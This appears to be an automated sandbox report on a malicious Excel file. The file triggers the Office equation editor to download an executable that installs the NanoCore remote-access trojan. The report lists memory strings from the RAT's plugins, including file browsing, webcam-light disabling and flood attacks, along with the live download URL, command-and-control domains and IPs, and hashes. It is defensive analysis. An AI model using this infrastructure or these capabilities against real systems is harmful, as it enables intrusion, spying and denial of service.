leNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005326E2 bind,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00532690 bind,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery4Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information3Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 508452 Sample: Sts Global Order.xlsx Startdate: 25/10/2021 Architecture: WINDOWS Score: 100 39 Multi AV Scanner detection for domain / URL 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 18 other signatures 2->45 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 33 27 2->12         started        process3 dnsIp4 37 itisalllove.servepics.com 31.3.244.76, 49167, 80 IOMART-ASGB United Kingdom 7->37 27 C:\Users\user\AppData\Local\...\sunday[1].exe, PE32 7->27 dropped 29 C:\Users\Public\vbc.exe, PE32 7->29 dropped 49 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->49 14 vbc.exe 1 10 7->14         started        file5 signatures6 process7 file8 31 C:\Users\user\AppData\...\CXFxEHIAOoJFws.exe, PE32 14->31 dropped 33 C:\Users\user\AppData\Local\...\tmp98E5.tmp, XML 14->33 dropped 51 Machine Learning detection for dropped file 14->51 53 Uses schtasks.exe or at.exe to add and modify task schedules 14->53 55 Writes to foreign memory regions 14->55 57 2 other signatures 14->57 18 RegSvcs.exe 7 14->18         started        23 schtasks.exe 14->23         started        signatures9 process10 dnsIp11 35 newme122.3utilities.com 23.105.131.228, 49168, 49169, 49170 LEASEWEB-USA-NYC-11US United States 18->35 25 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->25 dropped 47 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->47 file12 signatures13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\CXFxEHIAOoJFws.exe100%Joe Sandbox ML
C:\Users\Public\vbc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exe45%VirustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
7.2.RegSvcs.exe.d10000.12.unpack100%AviraTR/NanoCore.fadteDownload File
7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

Domains

SourceDetectionScannerLabelLink
newme122.3utilities.com9%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://itisalllove.servepics.com/georgia/city/sunday.exe1%VirustotalBrowse
http://itisalllove.servepics.com/georgia/city/sunday.exe0%Avira URL Cloudsafe
newme1122.3utilities.com12%VirustotalBrowse
newme1122.3utilities.com100%Avira URL Cloudphishing
newme122.3utilities.com9%VirustotalBrowse
newme122.3utilities.com100%Avira URL Cloudphishing
http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
newme122.3utilities.com
23.105.131.228
truetrueunknown
itisalllove.servepics.com
31.3.244.76
truetrue
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://itisalllove.servepics.com/georgia/city/sunday.exetrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    newme1122.3utilities.comtrue
    • 12%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    newme122.3utilities.comtrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAvbc.exe, 00000004.00000002.493501284.0000000007820000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.677233027.0000000004F20000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.493501284.0000000007820000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.677233027.0000000004F20000.00000002.00020000.sdmpfalse
      high
      http://google.comRegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpfalse
        high
        http://www.collada.org/2005/11/COLLADASchema9Donevbc.exe, 00000004.00000002.478159349.0000000000940000.00000004.00020000.sdmpfalse
        • URL Reputation: safe
        unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        23.105.131.228
        newme122.3utilities.comUnited States
        396362LEASEWEB-USA-NYC-11UStrue
        31.3.244.76
        itisalllove.servepics.comUnited Kingdom
        20860IOMART-ASGBtrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:508452
        Start date:25.10.2021
        Start time:09:12:26
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 8m 45s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:Sts Global Order.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLSX@8/18@20/2
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
        • TCP Packets have been reduced to 100
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtEnumerateValueKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:13:41API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
        09:13:49API Interceptor19x Sleep call for process: vbc.exe modified
        09:13:51API Interceptor1x Sleep call for process: schtasks.exe modified
        09:13:54API Interceptor1480x Sleep call for process: RegSvcs.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        23.105.131.228R7nWmIxbbl.exeGet hashmaliciousBrowse
          ubwJ8nHmzP.exeGet hashmaliciousBrowse
            PO #11325201021.xlsxGet hashmaliciousBrowse
              HSBC.exeGet hashmaliciousBrowse
                UUGCfhIdFD.exeGet hashmaliciousBrowse
                  KPcrOQcb5P.exeGet hashmaliciousBrowse
                    rGsJ1mXomJ.exeGet hashmaliciousBrowse
                      31.3.244.76product specification.xlsxGet hashmaliciousBrowse
                      • livinglifeeveryday.servemp3.com/georgia/state/file.exe
                      PO 11325201021.xlsxGet hashmaliciousBrowse
                      • livinglifeeveryday.servemp3.com/georgia/state/new.exe
                      PO no 275.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76/chona/new.exe
                      Scanned Copy.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76/chona/file.exe
                      PO no 275.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76/chona/new.exe
                      SB883681QI.xlsxGet hashmaliciousBrowse
                      • chonametrix.bounceme.net/chona/file.exe

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      newme122.3utilities.comR7nWmIxbbl.exeGet hashmaliciousBrowse
                      • 23.105.131.228
                      product specification.xlsxGet hashmaliciousBrowse
                      • 23.105.131.228
                      PO 11325201021.xlsxGet hashmaliciousBrowse
                      • 23.105.131.228
                      ubwJ8nHmzP.exeGet hashmaliciousBrowse
                      • 23.105.131.228
                      PO #11325201021.xlsxGet hashmaliciousBrowse
                      • 23.105.131.228

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      IOMART-ASGBproduct specification.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      PO 11325201021.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      aIY7AxjUMcGet hashmaliciousBrowse
                      • 176.56.203.123
                      notabotnet.x86Get hashmaliciousBrowse
                      • 188.227.163.98
                      dLOVD1avSgGet hashmaliciousBrowse
                      • 85.232.45.187
                      4700005126647.exeGet hashmaliciousBrowse
                      • 109.169.39.245
                      MV ROCKET_PDA.exeGet hashmaliciousBrowse
                      • 5.77.41.136
                      f_00a924.htmlGet hashmaliciousBrowse
                      • 185.181.124.113
                      PO no 275.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      TnBhtnJ.HtMLGet hashmaliciousBrowse
                      • 5.152.205.141
                      9LjOeq9jnl.exeGet hashmaliciousBrowse
                      • 62.233.121.61
                      DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsxGet hashmaliciousBrowse
                      • 62.233.121.61
                      Scanned Copy.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      PO no 275.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      FACTURA.exeGet hashmaliciousBrowse
                      • 109.169.39.245
                      tw5UWfYw0b.exeGet hashmaliciousBrowse
                      • 62.233.121.61
                      v3YfBIj.HtMLGet hashmaliciousBrowse
                      • 5.152.205.141
                      SB883681QI.xlsxGet hashmaliciousBrowse
                      • 31.3.244.76
                      FACTURA.exeGet hashmaliciousBrowse
                      • 109.169.39.245
                      Faktura 900011706 - 2476.exeGet hashmaliciousBrowse
                      • 109.169.39.245
                      LEASEWEB-USA-NYC-11USR7nWmIxbbl.exeGet hashmaliciousBrowse
                      • 23.105.131.228
                      ubwJ8nHmzP.exeGet hashmaliciousBrowse
                      • 23.105.131.228
                      PO #11325201021.xlsxGet hashmaliciousBrowse
                      • 23.105.131.228
                      Invoice Payment.exeGet hashmaliciousBrowse
                      • 23.105.131.236
                      Invoice Payment.exeGet hashmaliciousBrowse
                      • 23.105.131.236
                      order copy.pdf.exeGet hashmaliciousBrowse
                      • 23.105.131.161
                      Scan3094-03.exeGet hashmaliciousBrowse
                      • 23.105.131.220
                      payment details.pdf.exeGet hashmaliciousBrowse
                      • 23.105.131.206
                      C06689-L2C.pdf.exeGet hashmaliciousBrowse
                      • 23.105.131.206
                      OKNYaX8JqF.exeGet hashmaliciousBrowse
                      • 23.105.131.161
                      lt.exeGet hashmaliciousBrowse
                      • 23.105.131.161
                      triage_dropped_file.exeGet hashmaliciousBrowse
                      • 23.105.131.161
                      Payment Slips.exeGet hashmaliciousBrowse
                      • 23.105.131.236
                      order copy.pdf.exeGet hashmaliciousBrowse
                      • 23.105.131.161
                      Po requirements documents.jarGet hashmaliciousBrowse
                      • 23.105.131.187
                      xd.armGet hashmaliciousBrowse
                      • 142.91.50.26
                      Payment Receipt.exeGet hashmaliciousBrowse
                      • 23.105.131.212
                      SoftFun.exeGet hashmaliciousBrowse
                      • 23.105.131.196
                      RZAcKBlQo0.exeGet hashmaliciousBrowse
                      • 172.241.140.26

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exe
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:downloaded
                      Size (bytes):1085952
                      Entropy (8bit):7.900410175742084
                      Encrypted:false
                      SSDEEP:24576:vT120Gers/orbvtIeOIPr6e/kbHYI42Pv+1vVi:vhqC4o+l4rLsbHz42Pu
                      MD5:5DC1D41E2F9969D85896921F7B4AE261
                      SHA1:8DAE6EB305EAD57EEDDFDECBF34CCA61AF653973
                      SHA-256:2A95FEDE08D035E26D8A261C58359901344D23395094BD51F32E868964D61634
                      SHA-512:96AA1DC7A5780FE484120B32CA2B66234450787370A0CC7B25AFBFFDE7C4AE5DBFF84FC496C8D92FF8AB3507FDFA361CF055E2910B72085F02956647A240FB63
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: Virustotal, Detection: 45%, Browse
                      Reputation:low
                      IE Cache URL:http://itisalllove.servepics.com/georgia/city/sunday.exe
